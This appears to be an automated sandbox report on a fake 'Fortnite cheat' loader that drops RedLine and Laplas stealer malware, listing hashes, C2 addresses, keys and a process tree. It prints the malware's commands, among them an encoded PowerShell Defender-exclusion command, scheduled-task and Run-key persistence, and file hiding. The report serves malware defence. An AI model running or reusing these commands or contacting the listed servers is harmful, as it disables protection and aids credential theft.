Analysis
-
max time kernel: 144s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-07-2023 21:16
Static task: static1
Behavioral task: behavioral1 (Sample: Fortnite cheat/Loader.exe; Resource: win7-20230712-en)
Behavioral task: behavioral2 (Sample: Fortnite cheat/Loader.exe; Resource: win10-20230703-en)
Behavioral task: behavioral3 (Sample: Fortnite cheat/Loader.exe; Resource: win10v2004-20230703-en)
General
-
Target: Fortnite cheat/Loader.exe
Size: 252KB
MD5: 26fc4234f48b5a042bc075a7dcdf760e
SHA1: a866e3c4e083de5f7afd5867d41f2100113165f0
SHA256: 32cd1513e006dda8cf412ccf145e783c89727f3bdb5ac4e5cd0ce235082652e8
SHA512: 938479455b376252d790630c0ecf050c33f323815c54dde30978c3c2f249976400d339174e7bd07e25336b67b4d9a4a0a3a6dce9e562a8cde552a8c6cba10c12
SSDEEP: 3072:vcGDkOqcQVyec25qtpaZpeMn9SMoTQnfho6tNI9ByRdq9mxIrG7jxo:vcYao525qtwe1MoTQnfho6m2dq9tS7+
Malware Config
-
Extracted: redline
  @X_Store_support
  94.142.138.4:80
  auth_value: fd77b45902d41987d4650619467a4d55
-
Extracted: laplas
  http://185.209.161.189
  api_key: f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Downloads MZ/PE file
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  Process      Description        IoC
  Loader.exe   Key value queried  \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation
  conhost.exe  Key value queried  \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation
-
Executes dropped EXE (7 IoCs)
  PID   Process
  3996  svchost.exe
  1964  conhost.exe
  4460  7z.exe
  3196  7z.exe
  2356  7z.exe
  3984  4.exe
  2760  ntlhost.exe
-
Loads dropped DLL (3 IoCs)
  PID   Process
  4460  7z.exe
  3196  7z.exe
  2356  7z.exe
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
-
Adds Run key to start application (2 TTPs, 1 IoCs)
  Process      Description      IoC
  svchost.exe  Set value (str)  \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"
-
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
GoLang User-Agent (1 IoCs)
Uses default user-agent string defined by GoLang HTTP packages.
  Flow  Description             IoC
  64    HTTP User-Agent header  Go-http-client/1.1
-
Suspicious behavior: EnumeratesProcesses (12 IoCs; identical rows collapsed, event count in the last column)
  PID   Process         Events
  1384  Loader.exe      2
  3984  4.exe           8
  1116  powershell.exe  2
-
Suspicious use of AdjustPrivilegeToken (15 IoCs; identical rows collapsed, event count in the last column)
  PID   Process         Token                Events
  1384  Loader.exe      SeDebugPrivilege     1
  4460  7z.exe          SeRestorePrivilege   1
  4460  7z.exe          35                   1
  4460  7z.exe          SeSecurityPrivilege  2
  3196  7z.exe          SeRestorePrivilege   1
  3196  7z.exe          35                   1
  3196  7z.exe          SeSecurityPrivilege  2
  2356  7z.exe          SeRestorePrivilege   1
  2356  7z.exe          35                   1
  2356  7z.exe          SeSecurityPrivilege  2
  3984  4.exe           SeDebugPrivilege     1
  1116  powershell.exe  SeDebugPrivilege     1
-
Suspicious use of WriteProcessMemory (34 IoCs; identical rows collapsed, event count in the last column)
  PID   Process      Wrote to PID  procid_target  Events
  1384  Loader.exe   3996          92             2
  1384  Loader.exe   1964          93             3
  1964  conhost.exe  4604          94             2
  4604  cmd.exe      3312          96             2
  4604  cmd.exe      4460          97             2
  4604  cmd.exe      3196          98             2
  4604  cmd.exe      2356          99             2
  4604  cmd.exe      2292          101            2
  4604  cmd.exe      3984          100            3
  3984  4.exe        2940          103            3
  2940  cmd.exe      1116          105            3
  3984  4.exe        3844          107            3
  3984  4.exe        4488          109            3
  3996  svchost.exe  2760          102            2
-
Views/modifies file attributes (1 TTPs, 1 IoCs)
  PID   Process
  2292  attrib.exe
Processes
-
Loader.exe (PID 1384)
  image: C:\Users\Admin\AppData\Local\Temp\Fortnite cheat\Loader.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Fortnite cheat\Loader.exe"
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  svchost.exe (PID 3996)
    image: C:\Users\Admin\AppData\Local\Temp\svchost.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    ntlhost.exe (PID 2760)
      image: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      - Executes dropped EXE
  conhost.exe (PID 1964)
    image: C:\Users\Admin\AppData\Local\Temp\conhost.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    cmd.exe (PID 4604)
      image: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      - Suspicious use of WriteProcessMemory
      mode.com (PID 3312)
        image: C:\Windows\system32\mode.com
        command line: mode 65,10
      7z.exe (PID 4460)
        image: C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        command line: 7z.exe e file.zip -p151971033210090161381766327410 -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      7z.exe (PID 3196)
        image: C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        command line: 7z.exe e extracted/file_2.zip -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      7z.exe (PID 2356)
        image: C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        command line: 7z.exe e extracted/file_1.zip -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      4.exe (PID 3984)
        image: C:\Users\Admin\AppData\Local\Temp\main\4.exe
        command line: "4.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        cmd.exe (PID 2940)
          image: C:\Windows\SysWOW64\cmd.exe
          command line: "cmd.exe" /C powershell -EncodedCommand "PAAjAHUAZQBSAHMASwBBACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUgA4AGoAbwBuAE0AMABaACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAQwBZAHMAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGQAWgBLAHcAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
          decoded -EncodedCommand (base64 of UTF-16LE; the <#...#> parts are PowerShell block comments used as junk padding): <#ueRsKA#> Add-MpPreference <#R8jonM0Z#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dCYsx#> -Force <#ddZKwn#>
          - Suspicious use of WriteProcessMemory
          powershell.exe (PID 1116)
            image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -EncodedCommand "PAAjAHUAZQBSAHMASwBBACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAUgA4AGoAbwBuAE0AMABaACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAQwBZAHMAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBkAGQAWgBLAHcAbgAjAD4A"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        cmd.exe (PID 3844)
          image: C:\Windows\SysWOW64\cmd.exe
          command line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        cmd.exe (PID 4488)
          image: C:\Windows\SysWOW64\cmd.exe
          command line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9117" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      attrib.exe (PID 2292)
        image: C:\Windows\system32\attrib.exe
        command line: attrib +H "4.exe"
        - Views/modifies file attributes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 2.5MB
MD5: 6736c0e1179296ff6dfa0191ac874c7a
SHA1: 89566e42fb866eecf5e8282b967461299ab7a08c
SHA256: c60ecd5714a23a727d9749652883ec95bcdb350b9f278c34ac504edb898073e4
SHA512: 85791acbc9d538b92ac3c10a5ee87638ee0d9dd0323aa1eaf38c1c055e4312e5722f6b07e3f450c00cd595123a9981815a8ca972432749ee830852a76177125c
-
Filesize: 21KB
MD5: a761e93d5993567d382af163745760ad
SHA1: 27bd150490cd443a60bb70fa8b83299d75e02779
SHA256: 1edbffa93edd8b72a352aec6bbf6cd36b1045b26b8dfa141b10067aaddc8d6e1
SHA512: c9e4d46a747e02b7f387d6551f2d26ce847e66a69b8a8bddb276a83388b367f2fa28153402d5f274a81fcc260840afc043c4b853dd06d87125980a49934f14fa
-
Filesize: 1.6MB
MD5: 72491c7b87a7c2dd350b727444f13bb4
SHA1: 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256: 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512: 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize: 458KB
MD5: 619f7135621b50fd1900ff24aade1524
SHA1: 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256: 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize: 2.1MB
MD5: 4762f0b6652250641a06e2029d6dda23
SHA1: bfa7925486f951f729b3ce47caa6ff52330420ad
SHA256: 1e9654f0b077cfb8c393cb6cfd3d2b7918d87d56eaaf14f8523a582343d13b4e
SHA512: 33227e64cc34f7e591f6a26b6eaef2f2b4369050e5a2c544413b8f8264114083a93fa70911810c19390ed3d1724bd73c135a2acf11f12f70892f20609593c72d
-
Filesize: 9KB
MD5: 018ccdb718d3ad7641fecfdad0fbeb4e
SHA1: 46cdffdea8e44b455873659a35dcd973364a84dd
SHA256: 708b3379e029aafb112f890a6ae10f2a4eebe52eef991d2d6136a11fe84143b5
SHA512: dcd1494429ced81dfbcc83cb8c87d4cd42719d53918834e16691c0d068631ae39fe0381c668e92341a5cdccf75877c2af3ae81c66b6d37e4b149f68a06ab2803
-
Filesize: 1.5MB
MD5: 270d4612657b69eda3ebbb1207fc8cd7
SHA1: e023ff99c13c056fa7f80b55dc12f1d02df92114
SHA256: 83b0eb7eee4c982f034d53b7541758fac699956433baeedf9b8f4494e367b5e7
SHA512: 6fe46a7dd1fc6930646e3ba08306e1cfe826dcba6b7e3af1c9439157f35919739940e1d8143c6abecfa83f6b92d324764dfa8ca54dca91250b849c2cd138e6fe
-
Filesize: 1.5MB
MD5: 7cebec977eb671d25c4160ee75cbf124
SHA1: e09e0e906834b7f2ec270ba589a01e455ebdf0d1
SHA256: f0e78c63d52116f121709480935013c26a99bd85ba6bfd5100bc5e4411c7178e
SHA512: b79c8d6d4c947fdee755ef81c5c36d657ca1b4030c8f90f906961a22968c98d8fb6e33302191c28135c2593598876b6921f766270a50063754927b4404c798d1
-
Filesize: 436B
MD5: 7f4c4965a2f78d6de87d304fdd355abf
SHA1: 87a05c16753a036126677fe53118c07d36c0e671
SHA256: ed489607187114988306637dae2b81eff225315a8a8ee221249d14430f264fdb
SHA512: 41c949862477065b8f537670b6747074c9e543753812fcb28b02be12b1bbf0fb8b9473ea0859fb1450fee848d62d4c70249d09f48a5e5eac15eb510b70b3f741
-
Filesize: 4.0MB
MD5: d076c4b5f5c42b44d583c534f78adbe7
SHA1: c35478e67d490145520be73277cd72cd4e837090
SHA256: 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512: b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638
-
Filesize: 798.0MB
MD5: 4e804011c3dcec331cefe2c076de5efa
SHA1: 6163b50b7181202dceb2fd2ae1520200de0357f4
SHA256: a75f608e75c60d490e1d4c45b1b54c8f7c675de4ba00baac947be68d6d6da947
SHA512: 93a9957e5cb30c7ed700d70789c89c6de759330788f0e151295c87fddad5b4af6dbf1265c230e0eebc443d01ab9f267fd74868996d579c9ad41fac2e703d5a43